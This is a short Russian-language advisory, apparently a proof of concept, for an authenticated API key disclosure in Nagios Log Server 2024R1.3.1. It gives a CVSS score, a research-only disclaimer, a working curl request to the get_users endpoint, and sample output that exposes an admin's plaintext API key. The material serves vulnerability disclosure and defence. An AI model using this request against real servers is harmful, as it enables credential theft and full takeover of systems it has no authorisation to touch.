
Раскрытие аутентифицированного ключа API в Nagios Log Server 2024R1.3.1
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:HТолько для исследовательских и авторизованных целей. Пожалуйста, не используйте против систем без разрешения.
Уязвимость на уровне API в Nagios Log Server 2024R1.3.1 позволяет любому пользователю с действительным API-токеном получить полный список учётных записей вместе с их API-ключами в открытом виде, включая учётные данные администратора. Эта ошибка позволяет перечислять пользователей, повышать привилегии и осуществлять полную компрометацию системы через несанкционированное использование раскрытых токенов.
curl -X GET "http://<target-ip>/nagioslogserver/index.php/api/system/get_users?token=<valid_token>"
[
{
"name": "devadmin",
"username": "devadmin",
"email": "[email protected]",
"apikey": "dcaa1693a79d651ebc29d45c879b3fbbc730d2de",
"auth_type": "admin",
...
}
]